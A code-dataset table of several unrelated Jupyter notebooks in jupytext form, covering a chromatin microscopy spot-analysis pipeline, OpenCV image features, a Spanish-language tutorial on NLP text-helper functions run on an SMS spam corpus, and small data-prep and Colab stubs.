code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 0. required packages for h5py
# +
# %run "..\..\Startup_py3.py"
sys.path.append(r"..\..\..\..\Documents")
import ImageAnalysis3 as ia
# %matplotlib notebook
from ImageAnalysis3 import *
print(os.getpid())
import h5py
from ImageAnalysis3.classes import _allowed_kwds
import ast
# -
# # 1. Create field-of-view class
# +
# Reload project modules so in-notebook edits to ImageAnalysis3 take effect
# without restarting the kernel.
reload(ia)
reload(classes)
reload(classes.batch_functions)
reload(classes.field_of_view)
reload(io_tools.load)
reload(visual_tools)
reload(ia.correction_tools)
reload(ia.correction_tools.alignment)
reload(ia.spot_tools.matching)
reload(ia.segmentation_tools.chromosome)
reload(ia.spot_tools.fitting)
# Field-of-view parameters: raw-data location, output location, correction
# files, and shared image-processing settings.
# NOTE(review): single_im_size is presumably (z, y, x) in pixels and
# spot_seeding_th in camera counts -- confirm against ImageAnalysis3 docs.
fov_param = {'data_folder':r'\\10.245.74.158\Chromatin_NAS_6\20201002-B_dox-IAA-STI+_CTP-08_IgH',
             'save_folder':r'\\10.245.74.212\Chromatin_NAS_2\IgH_analyzed_results\20201002_IgH_proB_iaa_dox+',
             #'save_folder':r'D:\Pu_Temp\202009_IgH_proB_DMSO_2color',
             'experiment_type': 'DNA',
             'num_threads': 20,
             'correction_folder':r'\\10.245.74.158\Chromatin_NAS_0\Corrections\20201012-Corrections_2color',
             'shared_parameters':{
                 'single_im_size':[35,2048,2048],
                 'corr_channels':['750','647'],
                 'num_empty_frames': 0,
                 'corr_hot_pixel':True,
                 'corr_Z_shift':False,
                 'min_num_seeds':500,
                 'max_num_seeds': 2500,
                 'spot_seeding_th':125,
                 'normalize_intensity_local':True,
                 'normalize_intensity_background':False,
                 },
             }
# -
# Build the field-of-view object for fov 3; channel-to-region mapping is
# read from the 'Color_Usage' file.
fov = classes.field_of_view.Field_of_View(fov_param, _fov_id=3,
                                          _color_info_kwargs={
                                              '_color_filename':'Color_Usage',
                                          },
                                          _prioritize_saved_attrs=False,
                                          )
# ### 2. Process image into candidate spots
# +
reload(io_tools.load)
reload(spot_tools.fitting)
reload(correction_tools.chromatic)
reload(classes.batch_functions)
# process image into spots: drift-correct, (optionally) warp, and fit
# candidate spots for every 'unique' imaging round; results are cached in
# the fov save file, so the _overwrite_* flags control recomputation.
id_list, spot_list = fov._process_image_to_spots('unique',
                                                 #_sel_ids=np.arange(41,47),
                                                 _load_common_reference=True,
                                                 _load_with_multiple=False,
                                                 _save_images=True,
                                                 _warp_images=False,
                                                 _overwrite_drift=False,
                                                 _overwrite_image=False,
                                                 _overwrite_spot=False,
                                                 _verbose=True)
# -
# # 3. Find chromosomes
# ## 3.1 load chromosome image
overwrite_chrom = True
chrom_im = fov._load_chromosome_image(_type='forward',
                                      _overwrite=overwrite_chrom)
# ## 3.2 find candidate chromosomes
# Segmentation-based candidates: percentile-threshold the chromosome image,
# then clean up with morphology of the given size.
chrom_coords = fov._find_candidate_chromosomes_by_segmentation(_filt_size=4,
                                                               _binary_per_th=99.75,
                                                               _morphology_size=2,
                                                               _overwrite=overwrite_chrom)
# ## 3.3 select among candidate chromosomes
# Keep candidates supported by enough bright candidate spots.
chrom_coords = fov._select_chromosome_by_candidate_spots(_good_chr_loss_th=0.3,
                                                         _cand_spot_intensity_th=200,
                                                         _save=True,
                                                         _overwrite=overwrite_chrom)
# ### visualize chromosomes selections
# +
# %matplotlib notebook
# %matplotlib notebook
## visualize selected chromosome centers overlaid on the chromosome image.
# Coordinates are flipped (np.flipud) to match the viewer's axis order.
coord_dict = {'coords':[np.flipud(_coord) for _coord in fov.chrom_coords],
              # np.int was deprecated in NumPy 1.20 and removed in 1.24;
              # the builtin int is the documented replacement.
              'class_ids':list(np.zeros(len(fov.chrom_coords),dtype=int)),
              }
visual_tools.imshow_mark_3d_v2([fov.chrom_im],
                               given_dic=coord_dict,
                               save_file=None,
                               )
# -
# ## select spots based on chromosomes
fov._load_from_file('unique')
# +
# Keep only spots brighter than intensity_th, then assign each surviving
# spot to its nearest selected chromosome.
intensity_th = 200
from ImageAnalysis3.spot_tools.picking import assign_spots_to_chromosomes
kept_spots_list = []
for _spots in fov.unique_spots_list:
    # column 0 is presumably the fitted spot intensity/height -- TODO confirm
    kept_spots_list.append(_spots[_spots[:,0] > intensity_th])
# finalize candidate spots: one list of per-round candidates per chromosome
cand_chr_spots_list = [[] for _ct in fov.chrom_coords]
for _spots in kept_spots_list:
    _cands_list = assign_spots_to_chromosomes(_spots, fov.chrom_coords)
    for _i, _cands in enumerate(_cands_list):
        cand_chr_spots_list[_i].append(_cands)
print(f"kept chromosomes: {len(fov.chrom_coords)}")
# +
reload(spot_tools.picking)
from ImageAnalysis3.spot_tools.picking import convert_spots_to_hzxys
# Convert fitted spots to (h, z, x, y) rows in nanometers.
dna_cand_hzxys_list = [convert_spots_to_hzxys(_spots, fov.shared_parameters['distance_zxy'])
                       for _spots in cand_chr_spots_list]
dna_reg_ids = fov.unique_ids
dna_reg_channels = fov.unique_channels
chrom_coords = fov.chrom_coords
# select_hzxys close to the chromosome center
dist_th = 3000 # upper limit is 3000nm
good_chr_th = 0.8 # 80% of regions should have candidate spots
sel_dna_cand_hzxys_list = []
sel_chrom_coords = []
chr_cand_pers = []      # candidate coverage per chromosome (all)
sel_chr_cand_pers = []  # candidate coverage of kept chromosomes only
for _cand_hzxys, _chrom_coord in zip(dna_cand_hzxys_list, chrom_coords):
    _chr_cand_per = 0
    _sel_cands_list = []
    for _cands in _cand_hzxys:
        if len(_cands) == 0:
            _sel_cands_list.append([])
        else:
            # distance of each candidate to the chromosome center in nm;
            # [200,108,108] is presumably the (z,x,y) pixel size in nm -- TODO confirm
            _dists = np.linalg.norm(_cands[:,1:4] - _chrom_coord*np.array([200,108,108]), axis=1)
            _sel_cands_list.append(_cands[(_dists < dist_th)])
            _chr_cand_per += 1
    # fraction of regions with at least one candidate
    _chr_cand_per *= 1/len(_cand_hzxys)
    # append
    if _chr_cand_per >= good_chr_th:
        sel_dna_cand_hzxys_list.append(_sel_cands_list)
        sel_chrom_coords.append(_chrom_coord)
        sel_chr_cand_pers.append(_chr_cand_per)
    chr_cand_pers.append(_chr_cand_per)
print(f"kept chromosomes: {len(sel_chrom_coords)}")
# -
# ### EM pick spots
# +
# %matplotlib inline
reload(spot_tools.picking)
from ImageAnalysis3.spot_tools.picking import _maximize_score_spot_picking_of_chr, pick_spots_by_intensities,pick_spots_by_scores, generate_reference_from_population, evaluate_differences
# EM-style spot picking: E-step builds reference distance/intensity
# distributions from the current picks, M-step re-picks candidates by score
# against that reference, until picks stabilize.
niter= 10
num_threads = 32
ref_chr_cts = None
# initialize
init_dna_hzxys = pick_spots_by_intensities(sel_dna_cand_hzxys_list)
# set save list
sel_dna_hzxys_list, sel_dna_scores_list, all_dna_scores_list = [init_dna_hzxys], [], []
for _iter in range(niter):
    print(f"+ iter:{_iter}")
    # E: generate reference
    # NOTE(review): the current picks/ids are passed twice -- presumably
    # (candidate, reference) populations both use the last selection; confirm
    # against the generate_reference_from_population signature.
    ref_ct_dists, ref_local_dists, ref_ints = generate_reference_from_population(
        sel_dna_hzxys_list[-1], dna_reg_ids,
        sel_dna_hzxys_list[-1], dna_reg_ids,
        ref_channels=dna_reg_channels,
        ref_chr_cts=ref_chr_cts,
        num_threads=num_threads,
        collapse_regions=True,
        split_channels=True,
        verbose=True,
    )
    # diagnostic histograms of the reference distributions, one curve per channel
    plt.figure(figsize=(4,2), dpi=100)
    for _k, _v in ref_ct_dists.items():
        plt.hist(np.array(_v), bins=np.arange(0,5000,100), alpha=0.5, label=_k)
    plt.legend(fontsize=8)
    plt.title('center dist', fontsize=8)
    plt.show()
    plt.figure(figsize=(4,2), dpi=100)
    for _k, _v in ref_local_dists.items():
        plt.hist(np.array(_v), bins=np.arange(0,5000,100), alpha=0.5, label=_k)
    plt.legend(fontsize=8)
    plt.title('local dist', fontsize=8)
    plt.show()
    plt.figure(figsize=(4,2), dpi=100)
    for _k, _v in ref_ints.items():
        # NOTE(review): bins copied from the distance plots; confirm the
        # 0..5000 range suits the intensity scale.
        plt.hist(np.array(_v), bins=np.arange(0,5000,100), alpha=0.5, label=_k)
    plt.legend(fontsize=8)
    plt.title('intensity', fontsize=8)
    plt.show()
    # M: pick based on scores
    sel_hzxys_list, sel_scores_list, all_scores_list, other_scores_list = \
        pick_spots_by_scores(
            sel_dna_cand_hzxys_list, dna_reg_ids,
            cand_channels=dna_reg_channels,
            ref_hzxys_list=sel_dna_hzxys_list[-1], ref_ids=dna_reg_ids, ref_channels=dna_reg_channels,
            ref_ct_dists=ref_ct_dists, ref_local_dists=ref_local_dists, ref_ints=ref_ints,
            ref_chr_cts=ref_chr_cts,
            num_threads=num_threads,
            collapse_regions=True,
            split_channels=True,
            return_other_scores=True,
            verbose=True,
        )
    # check updating rate
    update_rate = evaluate_differences(sel_hzxys_list, sel_dna_hzxys_list[-1])
    print(f"-- region kept: {update_rate:.4f}")
    # append
    sel_dna_hzxys_list.append(sel_hzxys_list)
    sel_dna_scores_list.append(sel_scores_list)
    all_dna_scores_list.append(all_scores_list)
    # compare score distributions of selected vs. rejected candidates
    plt.figure(figsize=(4,2), dpi=100)
    plt.hist(np.concatenate([np.concatenate(_scores)
                             for _scores in other_scores_list]),
             bins=np.arange(-15,0), alpha=0.5, label='unselected')
    plt.hist(np.ravel([np.array(_sel_scores)
                       for _sel_scores in sel_dna_scores_list[-1]]),
             bins=np.arange(-15,0), alpha=0.5, label='selected')
    plt.legend(fontsize=8)
    plt.show()
    # converged: picks essentially unchanged between iterations
    if update_rate > 0.998:
        break
# +
from scipy.spatial.distance import pdist, squareform
# Final per-chromosome filtering of the EM picks: drop dim or low-score
# spots, then keep chromosomes that retain enough regions, and compute
# their pairwise distance maps.
sel_iter = -1
final_dna_hzxys_list = []
kept_chr_ids = []
distmap_list = []
score_th = -5
int_th = 300
bad_spot_percentage = 0.5
for _hzxys, _scores in zip(sel_dna_hzxys_list[sel_iter], sel_dna_scores_list[sel_iter]):
    _kept_hzxys = np.array(_hzxys).copy()
    # remove spots by intensity
    _bad_inds = _kept_hzxys[:,0] < int_th
    # remove spots by scores (boolean += acts as logical OR)
    _bad_inds += _scores < score_th
    #print(np.mean(_bad_inds))
    _kept_hzxys[_bad_inds] = np.nan
    if np.mean(np.isnan(_kept_hzxys).sum(1)>0)<bad_spot_percentage:
        kept_chr_ids.append(True)
        final_dna_hzxys_list.append(_kept_hzxys)
        distmap_list.append(squareform(pdist(_kept_hzxys[:,1:4])))
    else:
        kept_chr_ids.append(False)
# np.bool was deprecated in NumPy 1.20 and removed in 1.24; builtin bool is
# the documented replacement.
kept_chr_ids = np.array(kept_chr_ids, dtype=bool)
#kept_chrom_coords = np.array(sel_chrom_coords)[kept_chr_ids]
distmap_list = np.array(distmap_list)
# median distance map across all kept chromosomes (NaN-aware)
median_distmap = np.nanmedian(distmap_list, axis=0)
# -
# Per-region loss rate: fraction of kept chromosomes missing a spot in that region.
loss_rates = np.mean(np.sum(np.isnan(final_dna_hzxys_list), axis=2)>0, axis=0)
print(np.mean(loss_rates))
fig, ax = plt.subplots(figsize=(4,2),dpi=200)
ax.plot(loss_rates, '.-')
ax.set_xticks(np.arange(0,150,20))
plt.show()
# regions with <20% loss (overwritten by the next cell before use)
kept_inds = np.where(loss_rates<0.2)[0]
# +
# Recover the experimental imaging order of 'unique' regions from the color
# dictionary; entries starting with 'u' are unique-region hybridization rounds.
imaging_order = []
for _fd, _infos in fov.color_dic.items():
    for _info in _infos:
        if len(_info) > 0 and _info[0] == 'u':
            imaging_order.append(list(dna_reg_ids).index(int(_info[1:])))
# np.int was deprecated in NumPy 1.20 and removed in 1.24; builtin int is
# the documented replacement.
imaging_order = np.array(imaging_order, dtype=int)
#kept_inds = imaging_order # plot imaging ordered regions
#kept_inds = np.where(loss_rates<0.5)[0] # plot good regions only
kept_inds = np.arange(len(fov.unique_ids)) # plot all
# %matplotlib inline
# Median pairwise-distance map across kept chromosomes.
fig, ax = plt.subplots(figsize=(4,3),dpi=200)
ax = ia.figure_tools.distmap.plot_distance_map(median_distmap[kept_inds][:,kept_inds],
                                               color_limits=[0,600],
                                               ax=ax,
                                               ticks=np.arange(0,150,20),
                                               figure_dpi=500)
ax.set_title(f"proB iaa_dox_STI+, n={len(distmap_list)}", fontsize=7.5)
_ticks = np.arange(0, len(kept_inds), 20)
ax.set_xticks(_ticks)
ax.set_xticklabels(dna_reg_ids[kept_inds][_ticks])
ax.set_xlabel(f"5kb region id", fontsize=7, labelpad=2)
ax.set_yticks(_ticks)
ax.set_yticklabels(dna_reg_ids[kept_inds][_ticks])
ax.set_ylabel(f"5kb region id", fontsize=7, labelpad=2)
#ax.axvline(x=np.where(fov.unique_ids[kept_inds]>300)[0][0], color=[1,1,0])
#ax.axhline(y=np.where(fov.unique_ids[kept_inds]>300)[0][0], color=[1,1,0])
plt.gcf().subplots_adjust(bottom=0.1)
plt.show()
# -
# ## visualize single example
# +
# %matplotlib inline
reload(figure_tools.image)
chrom_id = 4
import matplotlib
import copy
# single-cell colormap: NaN (missing spot) rendered as grey
# NOTE(review): matplotlib.cm.get_cmap is deprecated since matplotlib 3.7;
# matplotlib.colormaps['seismic_r'] is the forward-compatible form.
sc_cmap = copy.copy(matplotlib.cm.get_cmap('seismic_r'))
sc_cmap.set_bad(color=[0.5,0.5,0.5,1])
#valid_inds = np.where(np.isnan(final_dna_hzxys_list[chrom_id]).sum(1) == 0)[0]
# np.bool was deprecated in NumPy 1.20 and removed in 1.24; builtin bool is
# the documented replacement.
valid_inds = np.ones(len(final_dna_hzxys_list[chrom_id]), dtype=bool) # all spots
fig, ax = plt.subplots(figsize=(4,3),dpi=200)
ax = ia.figure_tools.distmap.plot_distance_map(
    distmap_list[chrom_id][valid_inds][:,valid_inds],
    color_limits=[0,600],
    ax=ax,
    cmap=sc_cmap,
    ticks=np.arange(0,150,20),
    figure_dpi=200)
ax.set_title(f"proB DMSO chrom: {chrom_id}", fontsize=7.5)
plt.gcf().subplots_adjust(bottom=0.1)
plt.show()
# 3D rendering of this chromosome's picked (z,x,y) coordinates
ax3d = figure_tools.image.chromosome_structure_3d_rendering(
    final_dna_hzxys_list[chrom_id][valid_inds, 1:],
    marker_edge_line_width=0,
    reference_bar_length=200, image_radius=300,
    line_width=0.5, figure_dpi=300, depthshade=False)
plt.show()
# -
# ## visualize all fitted spots
# Inspect the saved HDF5 results of the 'unique' data group for this FOV.
with h5py.File(fov.save_filename, "r", libver='latest') as _f:
    _grp = _f['unique']
    _ind = list(_grp['ids'][:]).index(41)  # position of region id 41
    _im = _grp['ims'][_ind]
    sel_drifts = _grp['drifts'][:,:]
    sel_flags = _grp['flags'][:]
    sel_ids = _grp['ids'][:]
    sel_spots = _grp['spots'][:,:,:]
    # NOTE(review): prints spots[1], not spots[_ind] -- confirm intentional.
    print(_ind, np.sum(_grp['spots'][1]))
|
5kb_DNA_analysis/single_fov/20201002_updated_single_fov_IgH_batch1_proB_dox+_2color_Franklin.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# 'from scipy.stats import stats' imported the long-deprecated
# scipy.stats.stats alias module (removed in modern SciPy); the public
# module is scipy.stats.
from scipy import stats
import seaborn as sns
# %matplotlib inline
# +
# read in the raw data
# train.csv
# NOTE(review): '/..' at the filesystem root resolves back to '/'; this was
# probably meant to be a relative path ('../projects/...') -- confirm.
df = pd.read_csv('/../projects/project-3-house-prices/assets/train.csv')
# -
|
_posts/test_project3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Image to features
#
# Read an image with opencv.
# %matplotlib inline
import matplotlib.pyplot as plt
plt.style.use('ggplot')
from jyquickhelper import add_notebook_menu
# Render a clickable table of contents for this notebook.
add_notebook_menu()
# ## OpenCV
# +
import numpy as np
import argparse
import cv2
from numpy import matrix
import os
from functools import reduce
# create NumPy arrays from the boundaries
# BGR channel bounds (OpenCV loads images as BGR); pixels inside
# [lower, upper] are kept by the mask -- presumably a tomato-red range,
# TODO confirm.
lower = np.array([0, 0, 0], dtype = "uint8")
upper = np.array([100, 115, 240], dtype = "uint8")
i=0
List= []
folder = "tomates"
if not os.path.exists(folder):
    raise FileNotFoundError(os.path.abspath(folder))
# Turn every image in `folder` into one flattened masked-pixel row vector.
for element in os.listdir(folder):
    i+=1
    # load the image
    # NOTE(review): cv2.imread returns None for unreadable files, which
    # would make cv2.resize fail with an opaque error.
    image = cv2.imread(os.path.join(folder, element))
    res = cv2.resize(image,(100, 100), interpolation = cv2.INTER_CUBIC)
    # find the colors within the specified boundaries and apply the mask
    mask = cv2.inRange(res, lower, upper)
    output = cv2.bitwise_and(res, res, mask = mask)
    # flatten the masked 100x100x3 image into a single row
    shape = output.shape
    nb = reduce(lambda a,b: a*b, shape)
    mat = output.reshape((1, nb))
    List.append(mat)
    print(element, mat.shape)
# stack one row per image -> feature matrix
bigmat = np.vstack(List)
bigmat.shape
# -
from pyquickhelper.helpgen import NbImage
# Display one sample image inline to sanity-check the dataset.
NbImage("tomates/imgt_61.jpg")
|
_doc/notebooks/cheat_sheets/image_features.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # FUNCIONES DE AYUDA AL PROCESADO DE TEXTO
# # MLearner
#
# **MLearner** pretende ser una libreria de herramientas utiles para desarrollar algoritmos de Machine Learning e IA de manera mas facil e intuitiva. El desarrollo de esta libreria me ha servido para adquirir conocimientos de creacion de un proyecto de desarrollo software:
#
# - Integracion Continua y Despliegue Continuo.
#
# - Gestion de Repositorio a nivel de proyecto.
#
# - Gestion de Repositorio OpenSource.
#
# - Clean Code en desarrollo software.
#
# - Frameworks Machine Learning y Deep Learning.
#
# - Automatizacion de testing.
#
# - Documentacion de codigo.
#
# - Documentacion de la Libreria entorno Web.
#
# - Empaquetacion y publicacion en Pypi.
# 
# ### PyPI
# Para instalar **MLearner** ejecute:
# ```python
# pip install mlearner
# ```
#
# Como alternativa, puede descargar el paquete directamente desde PyPI https://pypi.python.org/pypi/mlearner, posteriormente desarchivelo y navegue hasta la ruta del paquete, una vez alli ejecute el siguiente comando:
# ```python
# python setup.py install
# ```
#
# ### Links
# - **Documentation:** https://jaisenbe58r.github.io/MLearner/
# - **Source code repository:** https://github.com/jaisenbe58r/MLearner
# - **PyPI:** https://pypi.python.org/pypi/mlearner
#
# ***
# # Text Helper Functions
#
# Implementation of functions for Natural language Processing
#
# > from mlearner.nlp.helpers import *
# ## Overview
# #### Helpers
#
#
# List of implemented modules:
#
# - URL
# - Emoticons
# - Email
# - Hash
# - Mention
# - Number
# - Phone Number
# - Year
# - Non Alphanumeric
# - Punctuations
# - Repetitive Character
# - Dollar
# - Number-Greater
# - Number-Lesser
# - Dates
# - Only Words
# - Only Numbers
# - Boundaries
# - Search
# - Pick Sentence
# - Duplicate Sentence
# - Caps Words
# - Length of Words
# - Length of Characters
# - Get ID
# - Specific String Rows
# - Hex code to Color
# - Tags
# - IP Address
# - Mac Address
# - Subword
# - Latitude & Longitude
# - PAN
# - Phone Number Country Code
# - Domain
# ## Importacion de Librerias
# +
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from mlearner import nlp
from mlearner.preprocessing import DataAnalyst
from mlearner.utils import keras_checkpoint
import emoji
# %load_ext autoreload
# %autoreload 2
# %matplotlib inline
# -
# ## Carga del dataset
#
# **SMS Spam Collection v.1**
#
# The SMS Spam Collection v.1 (hereafter the corpus) is a set of SMS tagged messages that have been collected for SMS Spam research. It contains one set of SMS messages in English of 5,574 messages, tagged acording being ham (legitimate) or spam.
#
# The Grumbletext Web site is: http://www.grumbletext.co.uk/
# +
file = "data/SMSSpamCollection.txt"
file_csv = "data/SMSSpamCollection.csv"
# Build the CSV version of the corpus once; afterwards load it directly.
if not os.path.isfile(file_csv):
    text = nlp.open_txt(file).replace("\t", "\n").split("\n")
    del text[-1]  # drop the trailing empty entry
    d = {'target': text[0::2], 'text': text[1::2]}
    sms = pd.DataFrame(d)
    sms.to_csv("data/SMSSpamCollection.csv", index=False)
else:
    sms = pd.read_csv(file_csv)
sms.head(5)
# -
dataset = DataAnalyst.load_dataframe(sms)
dataset.distribution_targets(target=["target"])
# ***
# ## Text processing
data_clean = dataset.data.copy()
# ### URLs
#
# * **find_url(text)**: Find URLs in the text
# Single-argument helpers are passed to .apply directly; wrapping them in
# `lambda x: f(x)` is redundant and behaves identically.
from mlearner.nlp.helpers import find_url
data_clean['url'] = dataset.data['text'].apply(find_url)
data_clean[data_clean["url"]!=""][["target", "url"]].head(5)
# ***
# ### Emojis
#
#
# * **find_emoji(text)**: Find emojis in the text.
#
# * **remove_emoji(text)**: Remove emojis from the text.
from mlearner.nlp.helpers import find_emoji, remove_emoji
sentence="I play () ... ()"
find_emoji(sentence)
data_clean['emoji'] = dataset.data['text'].apply(find_emoji)
data_clean['text'] = dataset.data['text'].apply(remove_emoji)
# ***
# ### Email
#
#
# * **find_email(text)**: Extract emails from the text.
#
from mlearner.nlp.helpers import find_email
data_clean['emails'] = dataset.data['text'].apply(find_email)
data_clean[data_clean["emails"]!=""][["target", "emails"]].head(5)
# ***
# ### Hash
#
# * **find_hash(text)**: Find hashtags in the text
#
from mlearner.nlp.helpers import find_hash
data_clean['Hash'] = dataset.data['text'].apply(find_hash)
data_clean[data_clean["Hash"]!=""][["target", "Hash"]].head(5)
data_clean["text"].iloc[471]
# ***
# ### Mention
#
# * **find_at(text)**: Find "@" mentions in the text
#
from mlearner.nlp.helpers import find_at
data_clean['Mention'] = dataset.data['text'].apply(find_at)
data_clean[data_clean["Mention"]!=""][["target", "Mention"]].tail(5)
# ***
# ### Numbers
#
# * **find_number(text)**: Find numbers in the text.
#
from mlearner.nlp.helpers import find_number
data_clean['Numbers'] = dataset.data['text'].apply(find_number)
data_clean[data_clean["Numbers"]!=""][["target", "Numbers"]].head(5)
# ***
# ### Phone Number
#
# * **find_phone_number(text)**: Find Spanish phone numbers in the text.
#
from mlearner.nlp.helpers import find_phone_number
data_clean['phone_number'] = dataset.data['text'].apply(find_phone_number)
find_phone_number("+34666999666")
# ***
# ### Find Year
#
# * **find_year(text)**: Find birth years in the text [1940-2040]
#
from mlearner.nlp.helpers import find_year
data_clean['Years'] = dataset.data['text'].apply(find_year)
data_clean[data_clean["Years"]!=""][["target", "Years"]].head(5)
# ***
# ### Non Alphanumeric characters
#
# * **find_nonalp(text)**: Extract non-alphanumeric characters.
#
from mlearner.nlp.helpers import find_nonalp
data_clean['nonalp'] = dataset.data['text'].apply(find_nonalp)
data_clean[data_clean["nonalp"]!=""][["target", "nonalp"]].head(5)
# ***
# ### Retrieve punctuations from sentence
#
# * **find_punct(text)**: Punctuation marks.
#
from mlearner.nlp.helpers import find_punct
data_clean['find_punct'] = dataset.data['text'].apply(find_punct)
data_clean[data_clean["find_punct"]!=""][["target", "find_punct"]].head(5)
# ***
# ### Unique Char
#
# * **unique_char(sentence)**: Remove repeated characters from a word.
#
from mlearner.nlp.helpers import unique_char
sentence="I lovee Machinee learning!"
unique_char(sentence)
# ***
# ### Prices
#
# * **find_coin(text, symbol="$")**: Find prices in the text
#
from mlearner.nlp.helpers import find_coin
# find_coin needs an extra keyword argument, so the lambda stays here
data_clean['find_coin$'] = dataset.data['text'].apply(lambda x : find_coin(x, symbol="$"))
data_clean[data_clean["find_coin$"]!=""][["target", "find_coin$"]].head(2)
dataset.data['text'].iloc[60]
# ***
# ### Numbers great
#
# * **num_great(text)**: Find numbers greater than 930.
#
from mlearner.nlp.helpers import num_great
data_clean['num_great'] = dataset.data['text'].apply(num_great)
data_clean[data_clean["num_great"]!=""][["target", "num_great"]].head(5)
# ***
# ### Numbers less
#
# * **num_less(text)**: Find numbers less than 930.
#
from mlearner.nlp.helpers import num_less
data_clean['num_less'] = dataset.data['text'].apply(num_less)
data_clean[data_clean["num_less"]!=""][["target", "num_less"]].tail(5)
# ***
# ### Find Dates
#
# * **find_dates(text)**: Find dates [mm-dd-yyyy]
#
from mlearner.nlp.helpers import find_dates
sentence="Todays date is 04/28/2020 for format mm/dd/yyyy, not 28/04/2020"
find_dates(sentence)
data_clean['find_dates'] = dataset.data['text'].apply(find_dates)
# ***
# ### Only Words
#
# * **only_words(text)**: Remove numbers from the text.
#
from mlearner.nlp.helpers import only_words
data_clean['only_words'] = dataset.data['text'].apply(only_words)
data_clean[data_clean["only_words"]!=""][["target", "only_words"]].head(5)
# ***
# ### Search Key
#
# * **search_string(text, key)**: Check whether a word occurs in the sentence.
#
from mlearner.nlp.helpers import search_string
data_clean['search_string'] = dataset.data['text'].apply(lambda x : search_string(x,' day '))
data_clean[data_clean["search_string"]==True][["target", "search_string"]].head(5)
data_clean["text"].iloc[163]
# ***
# ### pick only key sentence
#
# * **pick_only_key_sentence(text, keyword)**: Return the sentences containing the selected keyword.
#
from mlearner.nlp.helpers import pick_only_key_sentence
data_clean['pick_only_key_sentence'] = dataset.data['text'].apply(lambda x : pick_only_key_sentence(x,' day '))
data_clean[data_clean["pick_only_key_sentence"]!=""][["target", "pick_only_key_sentence"]].iloc[163:165]
# ***
# ### pick unique sentence
#
# * **pick_unique_sentence(text)**: Remove duplicated sentences
from mlearner.nlp.helpers import pick_unique_sentence
sentence="I thank doctors\nDoctors are working very hard in this pandemic situation\nI thank doctors"
pick_unique_sentence(sentence)
data_clean['pick_unique_sentence'] = dataset.data['text'].apply(pick_unique_sentence)
# ***
# ### Capital words
#
# * **find_capital(text)**: Find words whose first letter is capitalized.
from mlearner.nlp.helpers import find_capital
data_clean['find_capital'] = dataset.data['text'].apply(find_capital)
data_clean[data_clean["find_capital"]!=""][["target", "find_capital"]].head(5)
# ***
# ### Remove tag html
#
# * **remove_tag(text)**: Remove HTML tags.
from mlearner.nlp.helpers import remove_tag
sentence="Markdown sentences can use <br> for breaks and <i></i> for italics"
remove_tag(sentence)
data_clean['remove_tag'] = dataset.data['text'].apply(remove_tag)
# ***
# ### Mac address
#
# * **mac_add(text)**: Find MAC addresses in the text
from mlearner.nlp.helpers import mac_add
sentence="MAC ADDRESSES of this laptop - 00:24:17:b1:cc:cc. Other details will be mentioned"
mac_add(sentence)
data_clean['mac_add'] = dataset.data['text'].apply(mac_add)
# ***
# ### IP address
#
# * **ip_add(text)**: Find IP addresses in the text
from mlearner.nlp.helpers import ip_add
sentence="An example of ip address is 172.16.17.32"
ip_add(sentence)
data_clean['ip_add'] = dataset.data['text'].apply(ip_add)
# ***
# ### Extract number of subwords
#
# * **subword(string, sub)**: Return how many times the word root appears.
from mlearner.nlp.helpers import subword
sentence = 'Fundamentalism and constructivism are important skills'
subword(sentence,'ism') # change subword and try for others
data_clean['subword'] = dataset.data['text'].apply(lambda x : subword(x, "on"))
data_clean[["target", "text", "subword"]].head(5)
# ***
# ### Valid latitude & longitude
#
# * **lat_lon(string)**: Return whether the latitude/longitude value is valid.
from mlearner.nlp.helpers import lat_lon
lat_lon('28.6466772,76.8130649', display=True)
lat_lon('2324.3244,3423.432423', display=True)
data_clean['lat_lon'] = dataset.data['text'].apply(lat_lon)
data_clean[["target", "text", "lat_lon"]].head(5)
# ***
# ### Domain
#
# * **find_domain(string)**: Find domains in the text.
from mlearner.nlp.helpers import find_domain
data_clean['find_domain'] = dataset.data['text'].apply(find_domain)
data_clean[["target", "text", "find_domain"]].iloc[10:15]
data_clean["text"].iloc[12]
# ***
# Transposed overview of all derived columns
data_clean.T
|
docs/sources/user_guide/nlp/Text Helper Functions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import re

# Build a smaller evaluation split: copy the first NUM_LINES sentences of
# Dataset.txt into TestingData.txt, one per line.
NUM_LINES = 100000

# Context managers guarantee both files are closed even on error (the
# original leaked the input handle and closed the output manually).
with open('Dataset.txt') as _src:
    # source: get sentences
    ntext = re.split('\n', _src.read())

# destination file: put only 100k lines
with open("TestingData.txt", "w") as text_file:
    # NOTE: writes at most NUM_LINES lines; the original raised IndexError
    # when Dataset.txt held fewer than 100000 lines.
    for line in ntext[:NUM_LINES]:
        text_file.write(line + '\n')

print('Testing Data Made 10% LOL')
|
GetTestingData.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="lPv-MdE1sAkJ" outputId="33036546-2419-4f28-b9e8-e0f5a717eb9e" colab={"base_uri": "https://localhost:8080/", "height": 35}
# Mount Google Drive so the notebook can read/write project files in Colab.
from google.colab import drive
drive.mount('/content/drive/')
# + id="zfzXOqAksG4_" outputId="4bc12ec6-d142-47a5-d41e-e26f4bd0aa3c" colab={"base_uri": "https://localhost:8080/", "height": 35}
# %cd /content/drive/My Drive/Colab Notebooks/Transformers
# + id="7w5MgG3quSsn"
import torch
from torch import nn
from torch.autograd import Variable
import torch.nn.functional as F
